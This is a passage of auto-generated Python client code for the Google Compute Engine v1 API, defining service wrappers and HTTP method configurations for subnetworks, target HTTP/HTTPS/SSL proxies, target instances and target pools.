"""Creates a subnetwork in the specified project using the data included in the request.
Args:
request: (ComputeSubnetworksInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.subnetworks.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/subnetworks',
request_field=u'subnetwork',
request_type_name=u'ComputeSubnetworksInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
  """Retrieve the subnetworks available in the given project and region.

  Args:
    request: (ComputeSubnetworksListRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments
  Returns:
    (SubnetworkList) The response message.
  """
  # Look up the static method configuration and dispatch over HTTP.
  return self._RunMethod(
      self.GetMethodConfig('List'), request, global_params=global_params)

List.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.subnetworks.list',
    http_method=u'GET',
    relative_path=u'projects/{project}/regions/{region}/subnetworks',
    ordered_params=[u'project', u'region'],
    path_params=[u'project', u'region'],
    query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
    request_field='',
    request_type_name=u'ComputeSubnetworksListRequest',
    response_type_name=u'SubnetworkList',
    supports_download=False,
)
def SetPrivateIpGoogleAccess(self, request, global_params=None):
  """Toggle Private Google Access for VMs in this subnet.

  Controls whether instances without external IP addresses can reach
  Google services through Private Google Access.

  Args:
    request: (ComputeSubnetworksSetPrivateIpGoogleAccessRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments
  Returns:
    (Operation) The response message.
  """
  # Look up the static method configuration and dispatch over HTTP.
  return self._RunMethod(
      self.GetMethodConfig('SetPrivateIpGoogleAccess'), request,
      global_params=global_params)

SetPrivateIpGoogleAccess.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.subnetworks.setPrivateIpGoogleAccess',
    http_method=u'POST',
    relative_path=u'projects/{project}/regions/{region}/subnetworks/{subnetwork}/setPrivateIpGoogleAccess',
    ordered_params=[u'project', u'region', u'subnetwork'],
    path_params=[u'project', u'region', u'subnetwork'],
    query_params=[],
    request_field=u'subnetworksSetPrivateIpGoogleAccessRequest',
    request_type_name=u'ComputeSubnetworksSetPrivateIpGoogleAccessRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
class TargetHttpProxiesService(base_api.BaseApiService):
  """Service class for the targetHttpProxies resource.

  Auto-generated apitools service wrapper. Each public method fetches its
  ApiMethodInfo (attached right below the method as ``method_config``) via
  ``GetMethodConfig`` and delegates the HTTP round trip to ``_RunMethod``.
  Do not hand-edit the config literals: the URL templates, method ids and
  type names are the wire contract.
  """

  _NAME = u'targetHttpProxies'

  def __init__(self, client):
    super(ComputeV1.TargetHttpProxiesService, self).__init__(client)
    # This resource exposes no media-upload methods.
    self._upload_configs = {
        }

  def Delete(self, request, global_params=None):
    """Deletes the specified TargetHttpProxy resource.

    Args:
      request: (ComputeTargetHttpProxiesDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Delete')
    return self._RunMethod(
        config, request, global_params=global_params)

  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.targetHttpProxies.delete',
      ordered_params=[u'project', u'targetHttpProxy'],
      path_params=[u'project', u'targetHttpProxy'],
      query_params=[],
      relative_path=u'projects/{project}/global/targetHttpProxies/{targetHttpProxy}',
      request_field='',
      request_type_name=u'ComputeTargetHttpProxiesDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Returns the specified TargetHttpProxy resource. Get a list of available target HTTP proxies by making a list() request.

    Args:
      request: (ComputeTargetHttpProxiesGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TargetHttpProxy) The response message.
    """
    config = self.GetMethodConfig('Get')
    return self._RunMethod(
        config, request, global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.targetHttpProxies.get',
      ordered_params=[u'project', u'targetHttpProxy'],
      path_params=[u'project', u'targetHttpProxy'],
      query_params=[],
      relative_path=u'projects/{project}/global/targetHttpProxies/{targetHttpProxy}',
      request_field='',
      request_type_name=u'ComputeTargetHttpProxiesGetRequest',
      response_type_name=u'TargetHttpProxy',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Creates a TargetHttpProxy resource in the specified project using the data included in the request.

    Args:
      request: (ComputeTargetHttpProxiesInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Insert')
    return self._RunMethod(
        config, request, global_params=global_params)

  Insert.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetHttpProxies.insert',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[],
      relative_path=u'projects/{project}/global/targetHttpProxies',
      # The proxy definition travels in the request body.
      request_field=u'targetHttpProxy',
      request_type_name=u'ComputeTargetHttpProxiesInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves the list of TargetHttpProxy resources available to the specified project.

    Args:
      request: (ComputeTargetHttpProxiesListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TargetHttpProxyList) The response message.
    """
    config = self.GetMethodConfig('List')
    return self._RunMethod(
        config, request, global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.targetHttpProxies.list',
      ordered_params=[u'project'],
      path_params=[u'project'],
      # Standard paging/filtering knobs shared by all compute list() calls.
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/global/targetHttpProxies',
      request_field='',
      request_type_name=u'ComputeTargetHttpProxiesListRequest',
      response_type_name=u'TargetHttpProxyList',
      supports_download=False,
  )

  def SetUrlMap(self, request, global_params=None):
    """Changes the URL map for TargetHttpProxy.

    Args:
      request: (ComputeTargetHttpProxiesSetUrlMapRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('SetUrlMap')
    return self._RunMethod(
        config, request, global_params=global_params)

  SetUrlMap.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetHttpProxies.setUrlMap',
      ordered_params=[u'project', u'targetHttpProxy'],
      path_params=[u'project', u'targetHttpProxy'],
      query_params=[],
      # NOTE(review): unlike the other methods above, this path has no
      # '/global/' segment — presumably mirroring the service's discovery
      # document; confirm against the API reference before "fixing".
      relative_path=u'projects/{project}/targetHttpProxies/{targetHttpProxy}/setUrlMap',
      request_field=u'urlMapReference',
      request_type_name=u'ComputeTargetHttpProxiesSetUrlMapRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )
class TargetHttpsProxiesService(base_api.BaseApiService):
  """Service class for the targetHttpsProxies resource.

  Auto-generated apitools service wrapper. Each public method fetches its
  ApiMethodInfo (attached right below the method as ``method_config``) via
  ``GetMethodConfig`` and delegates the HTTP round trip to ``_RunMethod``.
  Do not hand-edit the config literals: the URL templates, method ids and
  type names are the wire contract.
  """

  _NAME = u'targetHttpsProxies'

  def __init__(self, client):
    super(ComputeV1.TargetHttpsProxiesService, self).__init__(client)
    # This resource exposes no media-upload methods.
    self._upload_configs = {
        }

  def Delete(self, request, global_params=None):
    """Deletes the specified TargetHttpsProxy resource.

    Args:
      request: (ComputeTargetHttpsProxiesDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Delete')
    return self._RunMethod(
        config, request, global_params=global_params)

  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.targetHttpsProxies.delete',
      ordered_params=[u'project', u'targetHttpsProxy'],
      path_params=[u'project', u'targetHttpsProxy'],
      query_params=[],
      relative_path=u'projects/{project}/global/targetHttpsProxies/{targetHttpsProxy}',
      request_field='',
      request_type_name=u'ComputeTargetHttpsProxiesDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Returns the specified TargetHttpsProxy resource. Get a list of available target HTTPS proxies by making a list() request.

    Args:
      request: (ComputeTargetHttpsProxiesGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TargetHttpsProxy) The response message.
    """
    config = self.GetMethodConfig('Get')
    return self._RunMethod(
        config, request, global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.targetHttpsProxies.get',
      ordered_params=[u'project', u'targetHttpsProxy'],
      path_params=[u'project', u'targetHttpsProxy'],
      query_params=[],
      relative_path=u'projects/{project}/global/targetHttpsProxies/{targetHttpsProxy}',
      request_field='',
      request_type_name=u'ComputeTargetHttpsProxiesGetRequest',
      response_type_name=u'TargetHttpsProxy',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Creates a TargetHttpsProxy resource in the specified project using the data included in the request.

    Args:
      request: (ComputeTargetHttpsProxiesInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Insert')
    return self._RunMethod(
        config, request, global_params=global_params)

  Insert.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetHttpsProxies.insert',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[],
      relative_path=u'projects/{project}/global/targetHttpsProxies',
      # The proxy definition travels in the request body.
      request_field=u'targetHttpsProxy',
      request_type_name=u'ComputeTargetHttpsProxiesInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves the list of TargetHttpsProxy resources available to the specified project.

    Args:
      request: (ComputeTargetHttpsProxiesListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TargetHttpsProxyList) The response message.
    """
    config = self.GetMethodConfig('List')
    return self._RunMethod(
        config, request, global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.targetHttpsProxies.list',
      ordered_params=[u'project'],
      path_params=[u'project'],
      # Standard paging/filtering knobs shared by all compute list() calls.
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/global/targetHttpsProxies',
      request_field='',
      request_type_name=u'ComputeTargetHttpsProxiesListRequest',
      response_type_name=u'TargetHttpsProxyList',
      supports_download=False,
  )

  def SetSslCertificates(self, request, global_params=None):
    """Replaces SslCertificates for TargetHttpsProxy.

    Args:
      request: (ComputeTargetHttpsProxiesSetSslCertificatesRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('SetSslCertificates')
    return self._RunMethod(
        config, request, global_params=global_params)

  SetSslCertificates.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetHttpsProxies.setSslCertificates',
      ordered_params=[u'project', u'targetHttpsProxy'],
      path_params=[u'project', u'targetHttpsProxy'],
      query_params=[],
      # NOTE(review): no '/global/' segment here, unlike the CRUD methods
      # above — presumably mirroring the discovery document; confirm
      # against the API reference before "fixing".
      relative_path=u'projects/{project}/targetHttpsProxies/{targetHttpsProxy}/setSslCertificates',
      request_field=u'targetHttpsProxiesSetSslCertificatesRequest',
      request_type_name=u'ComputeTargetHttpsProxiesSetSslCertificatesRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def SetUrlMap(self, request, global_params=None):
    """Changes the URL map for TargetHttpsProxy.

    Args:
      request: (ComputeTargetHttpsProxiesSetUrlMapRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('SetUrlMap')
    return self._RunMethod(
        config, request, global_params=global_params)

  SetUrlMap.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetHttpsProxies.setUrlMap',
      ordered_params=[u'project', u'targetHttpsProxy'],
      path_params=[u'project', u'targetHttpsProxy'],
      query_params=[],
      # NOTE(review): no '/global/' segment here either — see SetSslCertificates.
      relative_path=u'projects/{project}/targetHttpsProxies/{targetHttpsProxy}/setUrlMap',
      request_field=u'urlMapReference',
      request_type_name=u'ComputeTargetHttpsProxiesSetUrlMapRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )
class TargetInstancesService(base_api.BaseApiService):
  """Service class for the targetInstances resource.

  Auto-generated apitools service wrapper. Each public method fetches its
  ApiMethodInfo (attached right below the method as ``method_config``) via
  ``GetMethodConfig`` and delegates the HTTP round trip to ``_RunMethod``.
  Note that ``ordered_params`` preserves call-signature order while
  ``path_params`` is listed alphabetically; both describe the same set of
  URL-template substitutions.
  """

  _NAME = u'targetInstances'

  def __init__(self, client):
    super(ComputeV1.TargetInstancesService, self).__init__(client)
    # This resource exposes no media-upload methods.
    self._upload_configs = {
        }

  def AggregatedList(self, request, global_params=None):
    """Retrieves an aggregated list of target instances.

    Args:
      request: (ComputeTargetInstancesAggregatedListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TargetInstanceAggregatedList) The response message.
    """
    config = self.GetMethodConfig('AggregatedList')
    return self._RunMethod(
        config, request, global_params=global_params)

  AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.targetInstances.aggregatedList',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/aggregated/targetInstances',
      request_field='',
      request_type_name=u'ComputeTargetInstancesAggregatedListRequest',
      response_type_name=u'TargetInstanceAggregatedList',
      supports_download=False,
  )

  def Delete(self, request, global_params=None):
    """Deletes the specified TargetInstance resource.

    Args:
      request: (ComputeTargetInstancesDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Delete')
    return self._RunMethod(
        config, request, global_params=global_params)

  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.targetInstances.delete',
      ordered_params=[u'project', u'zone', u'targetInstance'],
      path_params=[u'project', u'targetInstance', u'zone'],
      query_params=[],
      relative_path=u'projects/{project}/zones/{zone}/targetInstances/{targetInstance}',
      request_field='',
      request_type_name=u'ComputeTargetInstancesDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Returns the specified TargetInstance resource. Get a list of available target instances by making a list() request.

    Args:
      request: (ComputeTargetInstancesGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TargetInstance) The response message.
    """
    config = self.GetMethodConfig('Get')
    return self._RunMethod(
        config, request, global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.targetInstances.get',
      ordered_params=[u'project', u'zone', u'targetInstance'],
      path_params=[u'project', u'targetInstance', u'zone'],
      query_params=[],
      relative_path=u'projects/{project}/zones/{zone}/targetInstances/{targetInstance}',
      request_field='',
      request_type_name=u'ComputeTargetInstancesGetRequest',
      response_type_name=u'TargetInstance',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Creates a TargetInstance resource in the specified project and zone using the data included in the request.

    Args:
      request: (ComputeTargetInstancesInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Insert')
    return self._RunMethod(
        config, request, global_params=global_params)

  Insert.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetInstances.insert',
      ordered_params=[u'project', u'zone'],
      path_params=[u'project', u'zone'],
      query_params=[],
      relative_path=u'projects/{project}/zones/{zone}/targetInstances',
      # The target-instance definition travels in the request body.
      request_field=u'targetInstance',
      request_type_name=u'ComputeTargetInstancesInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves a list of TargetInstance resources available to the specified project and zone.

    Args:
      request: (ComputeTargetInstancesListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TargetInstanceList) The response message.
    """
    config = self.GetMethodConfig('List')
    return self._RunMethod(
        config, request, global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.targetInstances.list',
      ordered_params=[u'project', u'zone'],
      path_params=[u'project', u'zone'],
      # Standard paging/filtering knobs shared by all compute list() calls.
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/zones/{zone}/targetInstances',
      request_field='',
      request_type_name=u'ComputeTargetInstancesListRequest',
      response_type_name=u'TargetInstanceList',
      supports_download=False,
  )
class TargetPoolsService(base_api.BaseApiService):
  """Service class for the targetPools resource.

  Auto-generated apitools service wrapper. Each public method fetches its
  ApiMethodInfo (attached right below the method as ``method_config``) via
  ``GetMethodConfig`` and delegates the HTTP round trip to ``_RunMethod``.
  Do not hand-edit the config literals: the URL templates, method ids and
  type names are the wire contract.
  """

  _NAME = u'targetPools'

  def __init__(self, client):
    super(ComputeV1.TargetPoolsService, self).__init__(client)
    # This resource exposes no media-upload methods.
    self._upload_configs = {
        }

  def AddHealthCheck(self, request, global_params=None):
    """Adds health check URLs to a target pool.

    Args:
      request: (ComputeTargetPoolsAddHealthCheckRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('AddHealthCheck')
    return self._RunMethod(
        config, request, global_params=global_params)

  AddHealthCheck.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetPools.addHealthCheck',
      ordered_params=[u'project', u'region', u'targetPool'],
      path_params=[u'project', u'region', u'targetPool'],
      query_params=[],
      relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/addHealthCheck',
      request_field=u'targetPoolsAddHealthCheckRequest',
      request_type_name=u'ComputeTargetPoolsAddHealthCheckRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def AddInstance(self, request, global_params=None):
    """Adds an instance to a target pool.

    Args:
      request: (ComputeTargetPoolsAddInstanceRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('AddInstance')
    return self._RunMethod(
        config, request, global_params=global_params)

  AddInstance.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetPools.addInstance',
      ordered_params=[u'project', u'region', u'targetPool'],
      path_params=[u'project', u'region', u'targetPool'],
      query_params=[],
      relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/addInstance',
      request_field=u'targetPoolsAddInstanceRequest',
      request_type_name=u'ComputeTargetPoolsAddInstanceRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def AggregatedList(self, request, global_params=None):
    """Retrieves an aggregated list of target pools.

    Args:
      request: (ComputeTargetPoolsAggregatedListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TargetPoolAggregatedList) The response message.
    """
    config = self.GetMethodConfig('AggregatedList')
    return self._RunMethod(
        config, request, global_params=global_params)

  AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.targetPools.aggregatedList',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/aggregated/targetPools',
      request_field='',
      request_type_name=u'ComputeTargetPoolsAggregatedListRequest',
      response_type_name=u'TargetPoolAggregatedList',
      supports_download=False,
  )

  def Delete(self, request, global_params=None):
    """Deletes the specified target pool.

    Args:
      request: (ComputeTargetPoolsDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Delete')
    return self._RunMethod(
        config, request, global_params=global_params)

  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.targetPools.delete',
      ordered_params=[u'project', u'region', u'targetPool'],
      path_params=[u'project', u'region', u'targetPool'],
      query_params=[],
      relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}',
      request_field='',
      request_type_name=u'ComputeTargetPoolsDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Returns the specified target pool. Get a list of available target pools by making a list() request.

    Args:
      request: (ComputeTargetPoolsGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TargetPool) The response message.
    """
    config = self.GetMethodConfig('Get')
    return self._RunMethod(
        config, request, global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.targetPools.get',
      ordered_params=[u'project', u'region', u'targetPool'],
      path_params=[u'project', u'region', u'targetPool'],
      query_params=[],
      relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}',
      request_field='',
      request_type_name=u'ComputeTargetPoolsGetRequest',
      response_type_name=u'TargetPool',
      supports_download=False,
  )

  def GetHealth(self, request, global_params=None):
    """Gets the most recent health check results for each IP for the instance that is referenced by the given target pool.

    Args:
      request: (ComputeTargetPoolsGetHealthRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TargetPoolInstanceHealth) The response message.
    """
    config = self.GetMethodConfig('GetHealth')
    return self._RunMethod(
        config, request, global_params=global_params)

  GetHealth.method_config = lambda: base_api.ApiMethodInfo(
      # POST despite the "Get" name: the instance reference is sent in
      # the request body (see request_field below).
      http_method=u'POST',
      method_id=u'compute.targetPools.getHealth',
      ordered_params=[u'project', u'region', u'targetPool'],
      path_params=[u'project', u'region', u'targetPool'],
      query_params=[],
      relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/getHealth',
      request_field=u'instanceReference',
      request_type_name=u'ComputeTargetPoolsGetHealthRequest',
      response_type_name=u'TargetPoolInstanceHealth',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Creates a target pool in the specified project and region using the data included in the request.

    Args:
      request: (ComputeTargetPoolsInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Insert')
    return self._RunMethod(
        config, request, global_params=global_params)

  Insert.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetPools.insert',
      ordered_params=[u'project', u'region'],
      path_params=[u'project', u'region'],
      query_params=[],
      relative_path=u'projects/{project}/regions/{region}/targetPools',
      # The target-pool definition travels in the request body.
      request_field=u'targetPool',
      request_type_name=u'ComputeTargetPoolsInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves a list of target pools available to the specified project and region.

    Args:
      request: (ComputeTargetPoolsListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TargetPoolList) The response message.
    """
    config = self.GetMethodConfig('List')
    return self._RunMethod(
        config, request, global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.targetPools.list',
      ordered_params=[u'project', u'region'],
      path_params=[u'project', u'region'],
      # Standard paging/filtering knobs shared by all compute list() calls.
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/regions/{region}/targetPools',
      request_field='',
      request_type_name=u'ComputeTargetPoolsListRequest',
      response_type_name=u'TargetPoolList',
      supports_download=False,
  )

  def RemoveHealthCheck(self, request, global_params=None):
    """Removes health check URL from a target pool.

    Args:
      request: (ComputeTargetPoolsRemoveHealthCheckRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('RemoveHealthCheck')
    return self._RunMethod(
        config, request, global_params=global_params)

  RemoveHealthCheck.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetPools.removeHealthCheck',
      ordered_params=[u'project', u'region', u'targetPool'],
      path_params=[u'project', u'region', u'targetPool'],
      query_params=[],
      relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/removeHealthCheck',
      request_field=u'targetPoolsRemoveHealthCheckRequest',
      request_type_name=u'ComputeTargetPoolsRemoveHealthCheckRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def RemoveInstance(self, request, global_params=None):
    """Removes instance URL from a target pool.

    Args:
      request: (ComputeTargetPoolsRemoveInstanceRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('RemoveInstance')
    return self._RunMethod(
        config, request, global_params=global_params)

  RemoveInstance.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetPools.removeInstance',
      ordered_params=[u'project', u'region', u'targetPool'],
      path_params=[u'project', u'region', u'targetPool'],
      query_params=[],
      relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/removeInstance',
      request_field=u'targetPoolsRemoveInstanceRequest',
      request_type_name=u'ComputeTargetPoolsRemoveInstanceRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def SetBackup(self, request, global_params=None):
    """Changes a backup target pool's configurations.

    Args:
      request: (ComputeTargetPoolsSetBackupRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('SetBackup')
    return self._RunMethod(
        config, request, global_params=global_params)

  SetBackup.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetPools.setBackup',
      ordered_params=[u'project', u'region', u'targetPool'],
      path_params=[u'project', u'region', u'targetPool'],
      # The only method on this resource with an extra query parameter.
      query_params=[u'failoverRatio'],
      relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/setBackup',
      request_field=u'targetReference',
      request_type_name=u'ComputeTargetPoolsSetBackupRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )
class TargetSslProxiesService(base_api.BaseApiService):
"""Service class for the targetSslProxies resource."""
_NAME = u'targetSslProxies'
def __init__(self, client):
super(ComputeV1.TargetSslProxiesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified TargetSslProxy resource.
Args:
request: (ComputeTargetSslProxiesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.targetSslProxies.delete',
ordered_params=[u'project', u'targetSslProxy'],
path_params=[u'project', u'targetSslProxy'],
query_params=[],
relative_path=u'projects/{project}/global/targetSslProxies/{targetSslProxy}',
request_field='',
request_type_name=u'ComputeTargetSslProxiesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified TargetSslProxy resource. Get a list of available target SSL proxies by making a list() request.
Args:
request: (ComputeTargetSslProxiesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetSslProxy) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetSslProxies.get',
ordered_params=[u'project', u'targetSslProxy'],
path_params=[u'project', u'targetSslProxy'],
query_params=[],
relative_path=u'projects/{project}/global/targetSslProxies/{targetSslProxy}',
request_field='',
request_type_name=u'ComputeTargetSslProxiesGetRequest',
response_type_name=u'TargetSslProxy',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a TargetSslProxy resource in the specified project using the data included in the request.
Args:
request: (ComputeTargetSslProxiesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetSslProxies.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/global/targetSslProxies',
request_field=u'targetSslProxy',
request_type_name=u'ComputeTargetSslProxiesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of TargetSslProxy resources available to the specified project.
Args:
request: (ComputeTargetSslProxiesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetSslProxyList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetSslProxies.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/targetSslProxies',
request_field='',
request_type_name=u'ComputeTargetSslProxiesListRequest',
response_type_name=u'TargetSslProxyList',
supports_download=False,
)
def SetBackendService(self, request, global_params=None):
"""Changes the BackendService for TargetSslProxy.
Args:
request: (ComputeTargetSslProxiesSetBackendServiceRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
